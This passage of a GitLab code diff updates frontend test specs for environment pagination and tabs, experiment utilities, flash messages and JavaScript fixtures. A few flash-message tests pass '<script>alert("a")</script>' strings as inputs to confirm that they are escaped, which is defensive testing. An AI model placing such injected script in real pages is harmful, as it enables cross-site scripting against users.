createApolloProvider = () => { const mockResolvers = { - Query: { environmentApp: environmentAppMock, folder: environmentFolderMock }, + Query: { + environmentApp: environmentAppMock, + folder: environmentFolderMock, + pageInfo: paginationMock, + }, }; return createMockApollo([], mockResolvers); }; - const createWrapper = (apolloProvider) => mount(EnvironmentsApp, { apolloProvider }); + const createWrapper = ({ provide = {}, apolloProvider } = {}) => + mountExtended(EnvironmentsApp, { + provide: { + newEnvironmentPath: '/environments/new', + canCreateEnvironment: true, + defaultBranchName: 'main', + ...provide, + }, + apolloProvider, + }); + + const createWrapperWithMocked = async ({ + provide = {}, + environmentsApp, + folder, + pageInfo = { + total: 20, + perPage: 5, + nextPage: 3, + page: 2, + previousPage: 1, + __typename: 'LocalPageInfo', + }, + }) => { + setWindowLocation('?scope=available&page=2'); + environmentAppMock.mockReturnValue(environmentsApp); + environmentFolderMock.mockReturnValue(folder); + paginationMock.mockReturnValue(pageInfo); + const apolloProvider = createApolloProvider(); + wrapper = createWrapper({ apolloProvider, provide }); + + await waitForPromises(); + await nextTick(); + }; beforeEach(() => { environmentAppMock = jest.fn(); environmentFolderMock = jest.fn(); + paginationMock = jest.fn(); }); afterEach(() => { @@ -34,17 +76,196 @@ describe('~/environments/components/new_environments_app.vue', () => { }); it('should show all the folders that are fetched', async () => { - environmentAppMock.mockReturnValue(resolvedEnvironmentsApp); - environmentFolderMock.mockReturnValue(resolvedFolder); - const apolloProvider = createApolloProvider(); - wrapper = createWrapper(apolloProvider); - - await waitForPromises(); - await Vue.nextTick(); + await createWrapperWithMocked({ + environmentsApp: resolvedEnvironmentsApp, + folder: resolvedFolder, + }); const text = wrapper.findAllComponents(EnvironmentsFolder).wrappers.map((w) => w.text()); 
expect(text).toContainEqual(expect.stringMatching('review')); expect(text).not.toContainEqual(expect.stringMatching('production')); }); + + it('should show a button to create a new environment', async () => { + await createWrapperWithMocked({ + environmentsApp: resolvedEnvironmentsApp, + folder: resolvedFolder, + }); + + const button = wrapper.findByRole('link', { name: s__('Environments|New environment') }); + expect(button.attributes('href')).toBe('/environments/new'); + }); + + it('should not show a button to create a new environment if the user has no permissions', async () => { + await createWrapperWithMocked({ + environmentsApp: resolvedEnvironmentsApp, + folder: resolvedFolder, + provide: { canCreateEnvironment: false, newEnvironmentPath: '' }, + }); + + const button = wrapper.findByRole('link', { name: s__('Environments|New environment') }); + expect(button.exists()).toBe(false); + }); + + it('should show a button to open the review app modal', async () => { + await createWrapperWithMocked({ + environmentsApp: resolvedEnvironmentsApp, + folder: resolvedFolder, + }); + + const button = wrapper.findByRole('button', { name: s__('Environments|Enable review app') }); + button.trigger('click'); + + await nextTick(); + + expect(wrapper.findByText(s__('ReviewApp|Enable Review App')).exists()).toBe(true); + }); + + it('should not show a button to open the review app modal if review apps are configured', async () => { + await createWrapperWithMocked({ + environmentsApp: { + ...resolvedEnvironmentsApp, + reviewApp: { canSetupReviewApp: false }, + }, + folder: resolvedFolder, + }); + await waitForPromises(); + await nextTick(); + + const button = wrapper.findByRole('button', { name: s__('Environments|Enable review app') }); + expect(button.exists()).toBe(false); + }); + + describe('tabs', () => { + it('should show tabs for available and stopped environmets', async () => { + await createWrapperWithMocked({ + environmentsApp: resolvedEnvironmentsApp, + folder: 
resolvedFolder, + }); + + const [available, stopped] = wrapper.findAllByRole('tab').wrappers; + + expect(available.text()).toContain(__('Available')); + expect(available.text()).toContain(resolvedEnvironmentsApp.availableCount); + expect(stopped.text()).toContain(__('Stopped')); + expect(stopped.text()).toContain(resolvedEnvironmentsApp.stoppedCount); + }); + + it('should change the requested scope on tab change', async () => { + await createWrapperWithMocked({ + environmentsApp: resolvedEnvironmentsApp, + folder: resolvedFolder, + }); + const stopped = wrapper.findByRole('tab', { + name: `${__('Stopped')} ${resolvedEnvironmentsApp.stoppedCount}`, + }); + + stopped.trigger('click'); + + await nextTick(); + await waitForPromises(); + + expect(environmentAppMock).toHaveBeenCalledWith( + expect.anything(), + expect.objectContaining({ scope: 'stopped' }), + expect.anything(), + expect.anything(), + ); + }); + }); + + describe('pagination', () => { + it('should sync page from query params on load', async () => { + await createWrapperWithMocked({ + environmentsApp: resolvedEnvironmentsApp, + folder: resolvedFolder, + }); + + expect(wrapper.findComponent(GlPagination).props('value')).toBe(2); + }); + + it('should change the requested page on next page click', async () => { + await createWrapperWithMocked({ + environmentsApp: resolvedEnvironmentsApp, + folder: resolvedFolder, + }); + const next = wrapper.findByRole('link', { + name: __('Go to next page'), + }); + + next.trigger('click'); + + await nextTick(); + await waitForPromises(); + + expect(environmentAppMock).toHaveBeenCalledWith( + expect.anything(), + expect.objectContaining({ page: 3 }), + expect.anything(), + expect.anything(), + ); + }); + + it('should change the requested page on previous page click', async () => { + await createWrapperWithMocked({ + environmentsApp: resolvedEnvironmentsApp, + folder: resolvedFolder, + }); + const prev = wrapper.findByRole('link', { + name: __('Go to previous page'), + }); + + 
prev.trigger('click'); + + await nextTick(); + await waitForPromises(); + + expect(environmentAppMock).toHaveBeenCalledWith( + expect.anything(), + expect.objectContaining({ page: 1 }), + expect.anything(), + expect.anything(), + ); + }); + + it('should change the requested page on specific page click', async () => { + await createWrapperWithMocked({ + environmentsApp: resolvedEnvironmentsApp, + folder: resolvedFolder, + }); + + const page = 1; + const pageButton = wrapper.findByRole('link', { + name: sprintf(__('Go to page %{page}'), { page }), + }); + + pageButton.trigger('click'); + + await nextTick(); + await waitForPromises(); + + expect(environmentAppMock).toHaveBeenCalledWith( + expect.anything(), + expect.objectContaining({ page }), + expect.anything(), + expect.anything(), + ); + }); + + it('should sync the query params to the new page', async () => { + await createWrapperWithMocked({ + environmentsApp: resolvedEnvironmentsApp, + folder: resolvedFolder, + }); + const next = wrapper.findByRole('link', { + name: __('Go to next page'), + }); + + next.trigger('click'); + + await nextTick(); + expect(window.location.search).toBe('?scope=available&page=3'); + }); + }); }); diff --git a/spec/frontend/experimentation/utils_spec.js b/spec/frontend/experimentation/utils_spec.js index 923795ca3f3..0d663fd055e 100644 --- a/spec/frontend/experimentation/utils_spec.js +++ b/spec/frontend/experimentation/utils_spec.js @@ -51,6 +51,29 @@ describe('experiment Utilities', () => { expect(experimentUtils.getExperimentData(...input)).toEqual(output); }); }); + + it('only collects the data properties which are supported by the schema', () => { + origGl = window.gl; + window.gl.experiments = { + my_experiment: { + experiment: 'my_experiment', + variant: 'control', + key: 'randomization-unit-key', + migration_keys: 'migration_keys object', + excluded: false, + other: 'foobar', + }, + }; + + expect(experimentUtils.getExperimentData('my_experiment')).toEqual({ + experiment: 
'my_experiment', + variant: 'control', + key: 'randomization-unit-key', + migration_keys: 'migration_keys object', + }); + + window.gl = origGl; + }); }); describe('getAllExperimentContexts', () => { @@ -72,29 +95,17 @@ describe('experiment Utilities', () => { it('returns an empty array if there are no experiments', () => { expect(experimentUtils.getAllExperimentContexts()).toEqual([]); }); - - it('only collects the data properties which are supported by the schema', () => { - origGl = window.gl; - window.gl.experiments = { - my_experiment: { experiment: 'my_experiment', variant: 'control', excluded: false }, - }; - - expect(experimentUtils.getAllExperimentContexts()).toEqual([ - { schema, data: { experiment: 'my_experiment', variant: 'control' } }, - ]); - - window.gl = origGl; - }); }); describe('isExperimentVariant', () => { describe.each` - experiment | variant | input | output - ${ABC_KEY} | ${DEFAULT_VARIANT} | ${[ABC_KEY, DEFAULT_VARIANT]} | ${true} - ${ABC_KEY} | ${'_variant_name'} | ${[ABC_KEY, '_variant_name']} | ${true} - ${ABC_KEY} | ${'_variant_name'} | ${[ABC_KEY, '_bogus_name']} | ${false} - ${ABC_KEY} | ${'_variant_name'} | ${['boguskey', '_variant_name']} | ${false} - ${undefined} | ${undefined} | ${[ABC_KEY, '_variant_name']} | ${false} + experiment | variant | input | output + ${ABC_KEY} | ${CANDIDATE_VARIANT} | ${[ABC_KEY]} | ${true} + ${ABC_KEY} | ${DEFAULT_VARIANT} | ${[ABC_KEY, DEFAULT_VARIANT]} | ${true} + ${ABC_KEY} | ${'_variant_name'} | ${[ABC_KEY, '_variant_name']} | ${true} + ${ABC_KEY} | ${'_variant_name'} | ${[ABC_KEY, '_bogus_name']} | ${false} + ${ABC_KEY} | ${'_variant_name'} | ${['boguskey', '_variant_name']} | ${false} + ${undefined} | ${undefined} | ${[ABC_KEY, '_variant_name']} | ${false} `( 'with input=$input, experiment=$experiment, variant=$variant', ({ experiment, variant, input, output }) => { diff --git a/spec/frontend/fixtures/api_deploy_keys.rb b/spec/frontend/fixtures/api_deploy_keys.rb new file mode 100644 index 
00000000000..7027b8c975b --- /dev/null +++ b/spec/frontend/fixtures/api_deploy_keys.rb @@ -0,0 +1,24 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe API::DeployKeys, '(JavaScript fixtures)', type: :request do + include ApiHelpers + include JavaScriptFixturesHelpers + + let_it_be(:admin) { create(:admin) } + let_it_be(:project) { create(:project) } + let_it_be(:project2) { create(:project) } + let_it_be(:deploy_key) { create(:deploy_key, public: true) } + let_it_be(:deploy_key2) { create(:deploy_key, public: true) } + let_it_be(:deploy_keys_project) { create(:deploy_keys_project, :write_access, project: project, deploy_key: deploy_key) } + let_it_be(:deploy_keys_project2) { create(:deploy_keys_project, :write_access, project: project2, deploy_key: deploy_key) } + let_it_be(:deploy_keys_project3) { create(:deploy_keys_project, :write_access, project: project, deploy_key: deploy_key2) } + let_it_be(:deploy_keys_project4) { create(:deploy_keys_project, :write_access, project: project2, deploy_key: deploy_key2) } + + it 'api/deploy_keys/index.json' do + get api("/deploy_keys", admin) + + expect(response).to be_successful + end +end diff --git a/spec/frontend/fixtures/api_markdown.rb b/spec/frontend/fixtures/api_markdown.rb deleted file mode 100644 index 89f012a5110..00000000000 --- a/spec/frontend/fixtures/api_markdown.rb +++ /dev/null @@ -1,65 +0,0 @@ -# frozen_string_literal: true - -require 'spec_helper' - -RSpec.describe API::MergeRequests, '(JavaScript fixtures)', type: :request do - include ApiHelpers - include WikiHelpers - include JavaScriptFixturesHelpers - - let_it_be(:user) { create(:user, username: 'gitlab') } - - let_it_be(:group) { create(:group, :public) } - let_it_be(:project) { create(:project, :public, :repository, group: group) } - - let_it_be(:label) { create(:label, project: project, title: 'bug') } - let_it_be(:milestone) { create(:milestone, project: project, title: '1.1') } - let_it_be(:issue) { create(:issue, 
project: project) } - let_it_be(:merge_request) { create(:merge_request, source_project: project) } - - let_it_be(:project_wiki) { create(:project_wiki, project: project, user: user) } - - let(:project_wiki_page) { create(:wiki_page, wiki: project_wiki) } - - before(:all) do - group.add_owner(user) - project.add_maintainer(user) - end - - before do - sign_in(user) - end - - markdown_examples = begin - yaml_file_path = File.expand_path('api_markdown.yml', __dir__) - yaml = File.read(yaml_file_path) - YAML.safe_load(yaml, symbolize_names: true) - end - - markdown_examples.each do |markdown_example| - context = markdown_example.fetch(:context, '') - name = markdown_example.fetch(:name) - - context "for #{name}#{!context.empty? ? " (context: #{context})" : ''}" do - let(:markdown) { markdown_example.fetch(:markdown) } - - name = "#{context}_#{name}" unless context.empty? - - it "api/markdown/#{name}.json" do - api_url = case context - when 'project' - "/#{project.full_path}/preview_markdown" - when 'group' - "/groups/#{group.full_path}/preview_markdown" - when 'project_wiki' - "/#{project.full_path}/-/wikis/#{project_wiki_page.slug}/preview_markdown" - else - api "/markdown" - end - - post api_url, params: { text: markdown, gfm: true } - expect(response).to be_successful - end - end - end -end diff --git a/spec/frontend/fixtures/api_markdown.yml b/spec/frontend/fixtures/api_markdown.yml deleted file mode 100644 index 8fd6a5531db..00000000000 --- a/spec/frontend/fixtures/api_markdown.yml +++ /dev/null @@ -1,289 +0,0 @@ -# This data file drives the specs in -# spec/frontend/fixtures/api_markdown.rb and -# spec/frontend/content_editor/extensions/markdown_processing_spec.js ---- -- name: attachment_image - context: group - markdown: '![test-file](/uploads/aa45a38ec2cfe97433281b10bbff042c/test-file.png)' -- name: attachment_image - context: project - markdown: '![test-file](/uploads/aa45a38ec2cfe97433281b10bbff042c/test-file.png)' -- name: attachment_image - context: 
project_wiki - markdown: '![test-file](test-file.png)' -- name: attachment_link - context: group - markdown: '[test-file](/uploads/aa45a38ec2cfe97433281b10bbff042c/test-file.zip)' -- name: attachment_link - context: project - markdown: '[test-file](/uploads/aa45a38ec2cfe97433281b10bbff042c/test-file.zip)' -- name: attachment_link - context: project_wiki - markdown: '[test-file](test-file.zip)' -- name: audio - markdown: '![Sample Audio](https://gitlab.com/gitlab.mp3)' -- name: audio_and_video_in_lists - markdown: |- - * ![Sample Audio](https://gitlab.com/1.mp3) - * ![Sample Video](https://gitlab.com/2.mp4) - - 1. ![Sample Video](https://gitlab.com/1.mp4) - 2. ![Sample Audio](https://gitlab.com/2.mp3) - - * [x] ![Sample Audio](https://gitlab.com/1.mp3) - * [x] ![Sample Audio](https://gitlab.com/2.mp3) - * [x] ![Sample Video](https://gitlab.com/3.mp4) -- name: blockquote - markdown: |- - > This is a blockquote - > - > This is another one -- name: bold - markdown: '**bold**' -- name: bullet_list_style_1 - markdown: |- - * list item 1 - * list item 2 - * embedded list item 3 -- name: bullet_list_style_2 - markdown: |- - - list item 1 - - list item 2 - * embedded list item 3 -- name: bullet_list_style_3 - markdown: |- - + list item 1 - + list item 2 - - embedded list item 3 -- name: code_block - markdown: |- - ```javascript - console.log('hello world') - ``` -- name: color_chips - markdown: |- - - `#F00` - - `#F00A` - - `#FF0000` - - `#FF0000AA` - - `RGB(0,255,0)` - - `RGB(0%,100%,0%)` - - `RGBA(0,255,0,0.3)` - - `HSL(540,70%,50%)` - - `HSLA(540,70%,50%,0.3)` -- name: description_list - markdown: |- - <dl> - <dt>Frog</dt> - <dd>Wet green thing</dd> - <dt>Rabbit</dt> - <dd>Warm fluffy thing</dd> - <dt>Punt</dt> - <dd>Kick a ball</dd> - <dd>Take a bet</dd> - <dt>Color</dt> - <dt>Colour</dt> - <dd> - - Any hue except _white_ or **black** - - </dd> - </dl> -- name: details - markdown: |- - <details> - <summary>Apply this patch</summary> - - ```diff - diff --git 
a/spec/frontend/fixtures/api_markdown.yml b/spec/frontend/fixtures/api_markdown.yml - index 8433efaf00c..69b12c59d46 100644 - --- a/spec/frontend/fixtures/api_markdown.yml - +++ b/spec/frontend/fixtures/api_markdown.yml - @@ -33,6 +33,13 @@ - * <ruby>漢<rt>ㄏㄢˋ</rt></ruby> - * C<sub>7</sub>H<sub>16</sub> + O<sub>2</sub> → CO<sub>2</sub> + H<sub>2</sub>O - * The **Pythagorean theorem** is often expressed as <var>a<sup>2</sup></var> + <var>b<sup>2</sup></var> = <var>c<sup>2</sup></var>.The **Pythagorean theorem** is often expressed as <var>a<sup>2</sup></var> + <var>b<sup>2</sup></var> = <var>c<sup>2</sup></var> - +- name: details - + markdown: |- - + <details> - + <summary>Apply this patch</summary> - + - + 🐶 much meta, 🐶 many patch - + 🐶 such diff, 🐶 very meme - + 🐶 wow! - + </details> - - name: link - markdown: '[GitLab](https://gitlab.com)' - - name: attachment_link - ``` - - </details> -- name: div - markdown: |- - <div>plain text</div> - <div> - - just a plain ol' div, not much to _expect_! - - </div> -- name: emoji - markdown: ':sparkles: :heart: :100:' -- name: emphasis - markdown: '_emphasized text_' -- name: figure - markdown: |- - <figure> - - ![Elephant at sunset](elephant-sunset.jpg) - - <figcaption>An elephant at sunset</figcaption> - </figure> - <figure> - - ![A crocodile wearing crocs](croc-crocs.jpg) - - <figcaption> - - A crocodile wearing _crocs_! - - </figcaption> - </figure> -- name: frontmatter_json - markdown: |- - ;;; - { - "title": "Page title" - } - ;;; -- name: frontmatter_toml - markdown: |- - +++ - title = "Page title" - +++ -- name: frontmatter_yaml - markdown: |- - --- - title: Page title - --- -- name: hard_break - markdown: |- - This is a line after a\ - hard break -- name: headings - markdown: |- - # Heading 1 - - ## Heading 2 - - ### Heading 3 - - #### Heading 4 - - ##### Heading 5 - - ###### Heading 6 -- name: horizontal_rule - markdown: '---' -- name: html_marks - markdown: |- - * Content editor is ~~great~~<ins>amazing</ins>. 
- * If the changes <abbr title="Looks good to merge">LGTM</abbr>, please <abbr title="Merge when pipeline succeeds">MWPS</abbr>. - * The English song <q>Oh I do like to be beside the seaside</q> looks like this in Hebrew: <span dir="rtl">אה, אני אוהב להיות ליד חוף הים</span>. In the computer's memory, this is stored as <bdo dir="ltr">אה, אני אוהב להיות ליד חוף הים</bdo>. - * <cite>The Scream</cite> by Edvard Munch. Painted in 1893. - * <dfn>HTML</dfn> is the standard markup language for creating web pages. - * Do not forget to buy <mark>milk</mark> today. - * This is a paragraph and <small>smaller text goes here</small>. - * The concert starts at <time datetime="20:00">20:00</time> and you'll be able to enjoy the band for at least <time datetime="PT2H30M">2h 30m</time>. - * Press <kbd>Ctrl</kbd> + <kbd>C</kbd> to copy text (Windows). - * WWF's goal is to: <q>Build a future where people live in harmony with nature.</q> We hope they succeed. - * The error occured was: <samp>Keyboard not found. Press F1 to continue.</samp> - * The area of a triangle is: 1/2 x <var>b</var> x <var>h</var>, where <var>b</var> is the base, and <var>h</var> is the vertical height. - * <ruby>漢<rt>ㄏㄢˋ</rt></ruby> - * C<sub>7</sub>H<sub>16</sub> + O<sub>2</sub> → CO<sub>2</sub> + H<sub>2</sub>O - * The **Pythagorean theorem** is often expressed as <var>a<sup>2</sup></var> + <var>b<sup>2</sup></var> = <var>c<sup>2</sup></var> -- name: image - markdown: '![alt text](https://gitlab.com/logo.png)' -- name: inline_code - markdown: '`code`' -- name: inline_diff - markdown: |- - * {-deleted-} - * {+added+} -- name: link - markdown: '[GitLab](https://gitlab.com)' -- name: math - markdown: |- - This math is inline $`a^2+b^2=c^2`$. - - This is on a separate line: - - ```math - a^2+b^2=c^2 - ``` -- name: ordered_list - markdown: |- - 1. list item 1 - 2. list item 2 - 3. list item 3 -- name: ordered_list_with_start_order - markdown: |- - 134. list item 1 - 135. list item 2 - 136. 
list item 3 -- name: ordered_task_list - markdown: |- - 1. [x] hello - 2. [x] world - 3. [ ] example - 1. [ ] of nested - 1. [x] task list - 2. [ ] items -- name: ordered_task_list_with_order - markdown: |- - 4893. [x] hello - 4894. [x] world - 4895. [ ] example -- name: reference - context: project_wiki - markdown: |- - Hi @gitlab - thank you for reporting this ~bug (#1) we hope to fix it in %1.1 as part of !1 -- name: strike - markdown: '~~del~~' -- name: table - markdown: |- - | header | header | - |--------|--------| - | `code` | cell with **bold** | - | ~~strike~~ | cell with _italic_ | - - # content after table -- name: table_of_contents - markdown: |- - [[_TOC_]] - - # Lorem - - Well, that's just like... your opinion.. man. - - ## Ipsum - - ### Dolar - - # Sit amit - - ### I don't know -- name: task_list - markdown: |- - * [x] hello - * [x] world - * [ ] example - * [ ] of nested - * [x] task list - * [ ] items -- name: thematic_break - markdown: |- - --- -- name: video - markdown: '![Sample Video](https://gitlab.com/gitlab.mp4)' -- name: word_break - markdown: Fernstraßen<wbr>bau<wbr>privat<wbr>finanzierungs<wbr>gesetz diff --git a/spec/frontend/fixtures/blob.rb b/spec/frontend/fixtures/blob.rb index f90e3662e98..bfdeee0881b 100644 --- a/spec/frontend/fixtures/blob.rb +++ b/spec/frontend/fixtures/blob.rb @@ -34,7 +34,7 @@ RSpec.describe Projects::BlobController, '(JavaScript fixtures)', type: :control get(:show, params: { namespace_id: project.namespace, project_id: project, - id: 'master/README.md' + id: "#{project.default_branch}/README.md" }) expect(response).to be_successful diff --git a/spec/frontend/fixtures/projects.rb b/spec/frontend/fixtures/projects.rb index 23c18c97df2..3c8964d398a 100644 --- a/spec/frontend/fixtures/projects.rb +++ b/spec/frontend/fixtures/projects.rb @@ -65,31 +65,5 @@ RSpec.describe 'Projects (JavaScript fixtures)', type: :controller do expect_graphql_errors_to_be_empty end end - - context 'project storage count query' do - 
before do - project.statistics.update!( - repository_size: 3900000, - lfs_objects_size: 4800000, - build_artifacts_size: 400000, - pipeline_artifacts_size: 400000, - wiki_size: 300000, - packages_size: 3800000, - uploads_size: 900000 - ) - end - - base_input_path = 'projects/storage_counter/queries/' - base_output_path = 'graphql/projects/storage_counter/' - query_name = 'project_storage.query.graphql' - - it "#{base_output_path}#{query_name}.json" do - query = get_graphql_query_as_string("#{base_input_path}#{query_name}") - - post_graphql(query, current_user: user, variables: { fullPath: project.full_path }) - - expect_graphql_errors_to_be_empty - end - end end end diff --git a/spec/frontend/fixtures/raw.rb b/spec/frontend/fixtures/raw.rb index 211c4e7c048..b117cfea5fa 100644 --- a/spec/frontend/fixtures/raw.rb +++ b/spec/frontend/fixtures/raw.rb @@ -7,41 +7,45 @@ RSpec.describe 'Raw files', '(JavaScript fixtures)' do let(:namespace) { create(:namespace, name: 'frontend-fixtures' )} let(:project) { create(:project, :repository, namespace: namespace, path: 'raw-project') } - let(:response) { @blob.data.force_encoding('UTF-8') } + let(:response) { @response } + + def blob_at(commit, path) + @response = project.repository.blob_at(commit, path).data.force_encoding('UTF-8') + end after do remove_repository(project) end it 'blob/notebook/basic.json' do - @blob = project.repository.blob_at('6d85bb69', 'files/ipython/basic.ipynb') + blob_at('6d85bb69', 'files/ipython/basic.ipynb') end it 'blob/notebook/markdown-table.json' do - @blob = project.repository.blob_at('f6b7a707', 'files/ipython/markdown-table.ipynb') + blob_at('f6b7a707', 'files/ipython/markdown-table.ipynb') end it 'blob/notebook/worksheets.json' do - @blob = project.repository.blob_at('6d85bb69', 'files/ipython/worksheets.ipynb') + blob_at('6d85bb69', 'files/ipython/worksheets.ipynb') end it 'blob/notebook/math.json' do - @blob = project.repository.blob_at('93ee732', 'files/ipython/math.ipynb') + 
blob_at('93ee732', 'files/ipython/math.ipynb') end it 'blob/pdf/test.pdf' do - @blob = project.repository.blob_at('e774ebd33', 'files/pdf/test.pdf') + blob_at('e774ebd33', 'files/pdf/test.pdf') end it 'blob/text/README.md' do - @blob = project.repository.blob_at('e774ebd33', 'README.md') + blob_at('e774ebd33', 'README.md') end it 'blob/images/logo-white.png' do - @blob = project.repository.blob_at('e774ebd33', 'files/images/logo-white.png') + blob_at('e774ebd33', 'files/images/logo-white.png') end it 'blob/binary/Gemfile.zip' do - @blob = project.repository.blob_at('e774ebd33', 'Gemfile.zip') + blob_at('e774ebd33', 'Gemfile.zip') end end diff --git a/spec/frontend/fixtures/tabs.rb b/spec/frontend/fixtures/tabs.rb new file mode 100644 index 00000000000..697ff1c7c20 --- /dev/null +++ b/spec/frontend/fixtures/tabs.rb @@ -0,0 +1,26 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe 'GlTabsBehavior', '(JavaScript fixtures)', type: :helper do + include JavaScriptFixturesHelpers + include TabHelper + + let(:response) { @tabs } + + it 'tabs/tabs.html' do + tabs = gl_tabs_nav({ data: { testid: 'tabs' } }) do + gl_tab_link_to('Foo', '#foo', item_active: true, data: { testid: 'foo-tab' }) + + gl_tab_link_to('Bar', '#bar', item_active: false, data: { testid: 'bar-tab' }) + + gl_tab_link_to('Qux', '#qux', item_active: false, data: { testid: 'qux-tab' }) + end + + panels = content_tag(:div, class: 'tab-content') do + content_tag(:div, 'Foo', { id: 'foo', class: 'tab-pane active', data: { testid: 'foo-panel' } }) + + content_tag(:div, 'Bar', { id: 'bar', class: 'tab-pane', data: { testid: 'bar-panel' } }) + + content_tag(:div, 'Qux', { id: 'qux', class: 'tab-pane', data: { testid: 'qux-panel' } }) + end + + @tabs = tabs + panels + end +end diff --git a/spec/frontend/fixtures/timezones.rb b/spec/frontend/fixtures/timezones.rb index 157f47855ea..2393f4e797d 100644 --- a/spec/frontend/fixtures/timezones.rb +++ b/spec/frontend/fixtures/timezones.rb @@ -8,11 
+8,9 @@ RSpec.describe TimeZoneHelper, '(JavaScript fixtures)' do let(:response) { @timezones.sort_by! { |tz| tz[:name] }.to_json } - it 'timezones/short.json' do - @timezones = timezone_data(format: :short) - end - - it 'timezones/full.json' do - @timezones = timezone_data(format: :full) + %I[short abbr full].each do |format| + it "timezones/#{format}.json" do + @timezones = timezone_data(format: format) + end end end diff --git a/spec/frontend/flash_spec.js b/spec/frontend/flash_spec.js index f7bde8d2f16..fc736f2d155 100644 --- a/spec/frontend/flash_spec.js +++ b/spec/frontend/flash_spec.js @@ -1,38 +1,14 @@ +import * as Sentry from '@sentry/browser'; import createFlash, { - createFlashEl, - createAction, hideFlash, - removeFlashClickListener, + addDismissFlashClickListener, + FLASH_TYPES, FLASH_CLOSED_EVENT, } from '~/flash'; -describe('Flash', () => { - describe('createFlashEl', () => { - let el; - - beforeEach(() => { - el = document.createElement('div'); - }); - - afterEach(() => { - el.innerHTML = ''; - }); - - it('creates flash element with type', () => { - el.innerHTML = createFlashEl('testing', 'alert'); - - expect(el.querySelector('.flash-alert')).not.toBeNull(); - }); - - it('escapes text', () => { - el.innerHTML = createFlashEl('<script>alert("a");</script>', 'alert'); - - expect(el.querySelector('.flash-text').textContent.trim()).toBe( - '<script>alert("a");</script>', - ); - }); - }); +jest.mock('@sentry/browser'); +describe('Flash', () => { describe('hideFlash', () => { let el; @@ -92,59 +68,12 @@ describe('Flash', () => { }); }); - describe('createAction', () => { - let el; - - beforeEach(() => { - el = document.createElement('div'); - }); - - it('creates link with href', () => { - el.innerHTML = createAction({ - href: 'testing', - title: 'test', - }); - - expect(el.querySelector('.flash-action').href).toContain('testing'); - }); - - it('uses hash as href when no href is present', () => { - el.innerHTML = createAction({ - title: 'test', - }); - - 
expect(el.querySelector('.flash-action').href).toContain('#'); - }); - - it('adds role when no href is present', () => { - el.innerHTML = createAction({ - title: 'test', - }); - - expect(el.querySelector('.flash-action').getAttribute('role')).toBe('button'); - }); - - it('escapes the title text', () => { - el.innerHTML = createAction({ - title: '<script>alert("a")</script>', - }); - - expect(el.querySelector('.flash-action').textContent.trim()).toBe( - '<script>alert("a")</script>', - ); - }); - }); - describe('createFlash', () => { const message = 'test'; - const type = 'alert'; - const parent = document; const fadeTransition = false; const addBodyClass = true; const defaultParams = { message, - type, - parent, actionConfig: null, fadeTransition, addBodyClass, @@ -171,14 +100,28 @@ describe('Flash', () => { document.querySelector('.js-content-wrapper').remove(); }); - it('adds flash element into container', () => { + it('adds flash alert element into the document by default', () => { createFlash({ ...defaultParams }); - expect(document.querySelector('.flash-alert')).not.toBeNull(); + expect(document.querySelector('.flash-container .flash-alert')).not.toBeNull(); + expect(document.body.className).toContain('flash-shown'); + }); + + it('adds flash of a warning type', () => { + createFlash({ ...defaultParams, type: FLASH_TYPES.WARNING }); + expect(document.querySelector('.flash-container .flash-warning')).not.toBeNull(); expect(document.body.className).toContain('flash-shown'); }); + it('escapes text', () => { + createFlash({ ...defaultParams, message: '<script>alert("a");</script>' }); + + expect(document.querySelector('.flash-text').textContent.trim()).toBe( + '<script>alert("a");</script>', + ); + }); + it('adds flash into specified parent', () => { createFlash({ ...defaultParams, parent: document.querySelector('.content-wrapper') }); @@ -210,7 +153,26 @@ describe('Flash', () => { expect(document.body.className).not.toContain('flash-shown'); }); + it('does not 
capture error using Sentry', () => { + createFlash({ ...defaultParams, captureError: false, error: new Error('Error!') }); + + expect(Sentry.captureException).not.toHaveBeenCalled(); + }); + + it('captures error using Sentry', () => { + createFlash({ ...defaultParams, captureError: true, error: new Error('Error!') }); + + expect(Sentry.captureException).toHaveBeenCalledWith(expect.any(Error)); + expect(Sentry.captureException).toHaveBeenCalledWith( + expect.objectContaining({ + message: 'Error!', + }), + ); + }); + describe('with actionConfig', () => { + const findFlashAction = () => document.querySelector('.flash-container .flash-action'); + it('adds action link', () => { createFlash({ ...defaultParams, @@ -219,20 +181,69 @@ describe('Flash', () => { }, }); - expect(document.querySelector('.flash-action')).not.toBeNull(); + expect(findFlashAction()).not.toBeNull(); + }); + + it('creates link with href', () => { + createFlash({ + ...defaultParams, + actionConfig: { + href: 'testing', + title: 'test', + }, + }); + + expect(findFlashAction().href).toBe(`${window.location}testing`); + expect(findFlashAction().textContent.trim()).toBe('test'); + }); + + it('uses hash as href when no href is present', () => { + createFlash({ + ...defaultParams, + actionConfig: { + title: 'test', + }, + }); + + expect(findFlashAction().href).toBe(`${window.location}#`); + }); + + it('adds role when no href is present', () => { + createFlash({ + ...defaultParams, + actionConfig: { + title: 'test', + }, + }); + + expect(findFlashAction().getAttribute('role')).toBe('button'); + }); + + it('escapes the title text', () => { + createFlash({ + ...defaultParams, + actionConfig: { + title: '<script>alert("a")</script>', + }, + }); + + expect(findFlashAction().textContent.trim()).toBe('<script>alert("a")</script>'); }); it('calls actionConfig clickHandler on click', () => { - const actionConfig = { - title: 'test', - clickHandler: jest.fn(), - }; + const clickHandler = jest.fn(); - createFlash({ 
...defaultParams, actionConfig }); + createFlash({ + ...defaultParams, + actionConfig: { + title: 'test', + clickHandler, + }, + }); - document.querySelector('.flash-action').click(); + findFlashAction().click(); - expect(actionConfig.clickHandler).toHaveBeenCalled(); + expect(clickHandler).toHaveBeenCalled(); }); }); @@ -252,7 +263,7 @@ describe('Flash', () => { }); }); - describe('removeFlashClickListener', () => { + describe('addDismissFlashClickListener', () => { let el; describe('with close icon', () => { @@ -268,7 +279,7 @@ describe('Flash', () => { }); it('removes global flash on click', (done) => { - removeFlashClickListener(el, false); + addDismissFlashClickListener(el, false); el.querySelector('.js-close-icon').click(); @@ -292,7 +303,7 @@ describe('Flash', () => { }); it('does not throw', () => { - expect(() => removeFlashClickListener(el, false)).not.toThrow(); + expect(() => addDismissFlashClickListener(el, false)).not.toThrow(); }); }); }); diff --git a/spec/frontend/gfm_auto_complete_spec.js b/spec/frontend/gfm_auto_complete_spec.js index 631e3307f7f..1ab3286fe4c 100644 --- a/spec/frontend/gfm_auto_complete_spec.js +++ b/spec/frontend/gfm_auto_complete_spec.js @@ -3,7 +3,7 @@ import MockAdapter from 'axios-mock-adapter'; import $ from 'jquery'; import labelsFixture from 'test_fixtures/autocomplete_sources/labels.json'; import GfmAutoComplete, { membersBeforeSave, 